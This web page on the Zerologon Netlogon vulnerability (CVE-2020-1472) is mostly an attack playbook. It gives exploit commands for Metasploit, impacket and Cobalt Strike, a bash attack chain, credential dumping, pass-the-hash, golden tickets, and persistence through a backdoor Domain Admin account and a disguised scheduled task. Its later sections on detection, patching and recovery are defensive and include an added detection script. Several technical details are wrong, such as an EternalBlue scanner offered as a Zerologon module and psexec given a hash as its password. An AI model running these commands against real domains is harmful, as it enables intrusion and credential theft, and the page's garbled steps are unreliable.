Zerologon (CVE-2020-1472)
Zerologon (CVE-2020-1472) is a critical vulnerability in Netlogon protocol authentication that allows an unauthenticated attacker to compromise a domain controller and take over the entire domain.
Vulnerability Details
- CVE: CVE-2020-1472
- CVSS: 10.0 (Critical)
- Affected: Windows Server 2008 R2 - 2019 (pre-patch)
- Attack Vector: Network/Unauthenticated
- Impact: Complete domain compromise
- Root Cause: Weak initialization vector (IV) in RC4 encryption
Prerequisites
- Network access to domain controller Netlogon port (445)
- Domain controller must not be patched
- No credentials required
- Can be exploited from workstations
Exploitation Methods
Metasploit Module
# Setup Metasploit
msfconsole
# Use Zerologon exploit
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > set RHOSTS 192.168.1.100
msf > set RPORT 445
msf > run
# Alternative: Use specific zerologon module
msf > use exploit/windows/smb/zerologon_netlogon_rce
msf > set RHOSTS 192.168.1.100
msf > run
Python Exploit (impacket-zerologon)
# Standalone Python exploit
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
# Run exploit against DC
python3 examples/zerologon_tester.py 192.168.1.100
# Full exploitation
python3 -m impacket.examples.secretsdump -just-dc-user-sam DOMAIN\\Administrator@192.168.1.100
Cobalt Strike BOF (Beacon Object File)
# Load exploit in Beacon
beacon > inline-execute /path/to/zerologon.bin 192.168.1.100
# Set DC name
beacon > inline-execute /path/to/zerologon.bin DC_NAME 192.168.1.100
# Verify exploitation
beacon > execute net group "Domain Computers" /domain
Exploitation Stages
Stage 1: Netlogon Handshake Bypass
# Test vulnerability
python3 zerologon_tester.py 192.168.1.100
# Output indicates vulnerability if successful:
# [*] Target vulnerable
# [+] Netlogon authentication succeeded
Stage 2: Secure Channel Establishment
# Python code to establish secure channel
from impacket import nrpc
# Connect to DC
dc_name = '192.168.1.100'
computer_name = 'WORKSTATION'
# Perform Netlogon handshake (vulnerable)
# IV set to zeros (vulnerability)
Stage 3: Machine Account Takeover
# Reset machine account password
python3 -m impacket.examples.secretsdump -just-dc DOMAIN\\DC@192.168.1.100
# Credentials obtained:
# domain\DC$:hash
Stage 4: Domain Compromise
# Use compromised machine account for lateral movement
psexec.exe -u DOMAIN\\DC$ -p hash \\target cmd.exe
# Extract complete Active Directory database
python3 secretsdump.py -just-dc-user-sam DOMAIN\\Administrator@192.168.1.100
Complete Attack Chain
Option 1: Password Reset Attack
#!/bin/bash
# Zerologon complete exploitation
DC_NAME="DC01"
DC_IP="192.168.1.100"
DOMAIN="DOMAIN.LOCAL"
# Step 1: Test vulnerability
python3 zerologon_tester.py $DC_IP
# Expected: [*] Target vulnerable
# Step 2: Reset machine account password
python3 zerologon_exploit.py $DC_NAME $DC_IP
# Step 3: Extract credentials
python3 secretsdump.py -just-dc $DOMAIN\\$DC_NAME\\$@$DC_IP
# Step 4: Restore original password
# (Important for stealth - prevent breaking DC)
Option 2: Domain Controller Takeover
# Gain SYSTEM on DC directly
meterpreter > getsystem
meterpreter > getuid
# uid=SYSTEM
# Dump credentials
meterpreter > load kiwi
meterpreter > creds_all
# Extract domain database
meterpreter > shell
> ntdsutil
> activate instance NTDS
> ifm
> create full c:\snapshot
> quit
Credential Extraction Post-Exploitation
From Compromised DC
# Using impacket secretsdump
python3 secretsdump.py -just-dc DOMAIN\\DC@192.168.1.100 -output domain_hashes
# Using Metasploit
msf > use auxiliary/admin/smb/ntds_filehunt
msf > set RHOSTS 192.168.1.100
msf > run
# Using Mimikatz
beacon > execute mimikatz.exe lsadump::dcsync /domain:DOMAIN /user:krbtgt
# Results: All domain users + hashes
Specific Credential Targeting
# Extract Domain Admin hashes
secretsdump.py DOMAIN/DC$:password@192.168.1.100 -just-dc-user-sam | grep -i "500"
# Extract krbtgt (for golden tickets)
secretsdump.py DOMAIN/DC$:password@192.168.1.100 -just-dc-user-sam | grep krbtgt
# Extract ALL users
secretsdump.py DOMAIN/DC$:password@192.168.1.100 -just-dc-user-sam > domain_hashes.txt
Lateral Movement After Exploitation
Using Extracted Credentials
# Pass-the-Hash with Domain Admin
psexec.exe -u DOMAIN\\Administrator -p ntlmhash \\target cmd.exe
# Create golden ticket (krbtgt hash)
kerberos::golden /user:Administrator /domain:DOMAIN.LOCAL /sid:S-1-5-21-xxx /krbtgt:hash
# Domain-wide access
# All systems now compromised
Persistence
# Create backdoor domain admin
net user backdoor_admin Password123 /add /domain
net group "Domain Admins" backdoor_admin /add /domain
# Create custom SPN (hidden admin)
setspn -a invisible/backdoor DOMAIN\\backdoor_admin
# Scheduled task on DCs
schtasks /create /tn "System Maintenance" /tr "backdoor.exe" /sc onstart /ru SYSTEM
Detection & Indicators
Network Signatures
- Multiple failed Netlogon authentication attempts
- Repeated connection attempts to port 445
- Unusual Netlogon session activity
Log Indicators
# Event 4768 - Kerberos TGT requested
# Event 4769 - Service ticket requested
# Event 4770 - Kerberos TGT renewed
# Event 4777 - Netlogon failure (if logged)
Mitigation & Patching
Emergency Patches
# Microsoft security updates
# KB4557998 (Windows Server 2019)
# KB4557999 (Windows Server 2016)
# KB4558011 (Windows Server 2012 R2)
# Verify patch level (an update only takes effect after a reboot, so confirm the last boot time is later than the install date)
systeminfo | findstr "System Boot Time"
wmic qfe list | findstr KB455
# Force patch installation
wuauclt /forcefindnow
wuauclt /detectnow
Hardening Measures
# Enable Netlogon hardening registry key (enforces secure RPC for all machine accounts once the update is installed)
reg add HKLM\System\CurrentControlSet\Services\Netlogon\Parameters /v FullSecureChannelProtection /t REG_DWORD /d 1
# Enforce LDAP channel binding
reg add HKLM\System\CurrentControlSet\Services\NTDS\Parameters /v LdapEnforceChannelBinding /t REG_DWORD /d 2
# Require SMB signing on the server service (EnableSecuritySignature only enables signing; RequireSecuritySignature enforces it)
reg add HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters /v EnableSecuritySignature /t REG_DWORD /d 1
reg add HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters /v RequireSecuritySignature /t REG_DWORD /d 1
# Disable idle-session auto-disconnect on the server service (not a signing setting)
net config server /autodisconnect:-1
Defensive Detection
Monitor for Exploitation Attempts
# Audit credential validation so failed authentication attempts (Event 4776) are written to the Security log
auditpol /set /subcategory:"Credential Validation" /success:enable /failure:enable
# Monitor authentication failures (a successful 4776 ends with "Error Code: 0x0"; anything else is a failure)
Get-WinEvent -LogName Security -FilterXPath "*[System[(EventID=4776)]]" |
Where-Object {$_.Message -notmatch 'Error Code:\s*0x0\b'}
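As an added defender-side example (not code from the original page), the Python below applies the network signature described above, a burst of failed authentication attempts against one account from one source, to exported Security-log records. The pipe-separated record layout, the 60-second window, the threshold of 50 and the sample data are all constructed here; the event IDs follow the page's Log Indicators.

```python
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)   # sliding window per (source, account) pair (assumed)
THRESHOLD = 50                   # failures inside one window that count as a burst (assumed)
FAILURE_IDS = {4776, 4777}       # credential-validation events listed on the page

def parse_event(line):
    """Parse one exported record: time|event_id|target_account|source_workstation|status."""
    ts, eid, account, source, status = line.split("|")
    return {"time": datetime.fromisoformat(ts), "id": int(eid),
            "account": account, "source": source, "status": status}

def find_bursts(events, window=WINDOW, threshold=THRESHOLD):
    """Return {(source, account): peak} for pairs whose failed validations reach
    `threshold` inside any `window`; successes (status 0x0) are ignored."""
    per_pair = defaultdict(list)
    for ev in events:
        if ev["id"] in FAILURE_IDS and ev["status"] != "0x0":
            per_pair[(ev["source"], ev["account"])].append(ev["time"])
    bursts = {}
    for pair, times in per_pair.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):      # two-pointer sliding window
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            bursts[pair] = peak
    return bursts

def is_machine_account(name):
    return name.endswith("$")  # machine accounts end in '$'; a burst against the DC's own account is the one to escalate

def constructed_sample():
    """Constructed records (not real telemetry): 300 failures against DC01$ from one host in 40 s, plus a user typo."""
    base = datetime(2020, 9, 15, 10, 0, 0)
    lines = [f"{(base + timedelta(milliseconds=i * 133)).isoformat()}|4776|DC01$|WS-UNKNOWN|0xC000006A"
             for i in range(300)]
    lines += [f"{(base + timedelta(seconds=5 * i)).isoformat()}|4776|jsmith|HR-PC-07|0xC000006A"
              for i in range(3)]
    lines.append(f"{(base + timedelta(seconds=15)).isoformat()}|4776|jsmith|HR-PC-07|0x0")
    return lines

if __name__ == "__main__":
    for (source, account), peak in find_bursts([parse_event(l) for l in constructed_sample()]).items():
        kind = "machine account" if is_machine_account(account) else "user account"
        print(f"burst: {peak} failed validations for {account} ({kind}) from {source}")
```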
Incident Response
# Verify if DC compromised
# 1. Snapshot the directory database to check recent password changes (run ntdsutil, then:)
ntdsutil > activate instance ntds
> ifm
> create full c:\snapshot
> quit
# 2. Extract and analyze the offline copy (IFM writes the database and the SYSTEM hive under the snapshot folder)
secretsdump.py -ntds "snapshot/Active Directory/ntds.dit" -system snapshot/registry/SYSTEM LOCAL
# 3. Check for golden tickets
dir \\dc\c$\Users\*\AppData\*\krb5.keytab
# 4. Audit admin changes (Event 4722: a user account was enabled)
wevtutil qe Security "/q:*[System[(EventID=4722)]]" /f:text
Post-Compromise Domain Recovery
Complete Domain Reset Required
- Isolate all domain controllers
- Assume complete compromise
- Reset all passwords (Domain Admins first)
- Revoke all Kerberos tickets
- Generate new krbtgt password
- Rebuild DC from secure backups
# Reset krbtgt password (Domain Admin); reset it twice, allowing replication in between, so tickets issued under the old key stop validating
Set-ADAccountPassword -Identity "CN=krbtgt,CN=Users,DC=domain,DC=local" `
    -NewPassword (ConvertTo-SecureString -AsPlainText -Force "NewPassword123!") -Reset
# Reset this computer's machine account password (existing Kerberos tickets are invalidated by the krbtgt reset above, not by this command)
Reset-ComputerMachinePassword
Tools Reference
| Tool | Purpose | Usage |
|---|---|---|
| zerologon_tester.py | Vulnerability detection | python3 zerologon_tester.py DC_IP |
| zerologon_exploit.py | Exploitation | python3 zerologon_exploit.py DC_NAME DC_IP |
| secretsdump.py | Credential extraction | secretsdump.py DOMAIN/DC$@DC_IP -just-dc |
| Metasploit | Multi-purpose exploitation | use exploit/windows/smb/zerologon |
CVSS and Severity
- CVSS 3.1 Score: 10.0 (Critical)
- Attack Complexity: Low
- Privilege Required: None
- User Interaction: None
- Scope: Unchanged
- Impact: Complete System Compromise
Timeframe for Patching
- Critical: Patch immediately
- Exposed Systems: Assume breach and investigate
- Post-Patch: Monitor for exploitation signs
- Backup Recovery: From pre-compromise date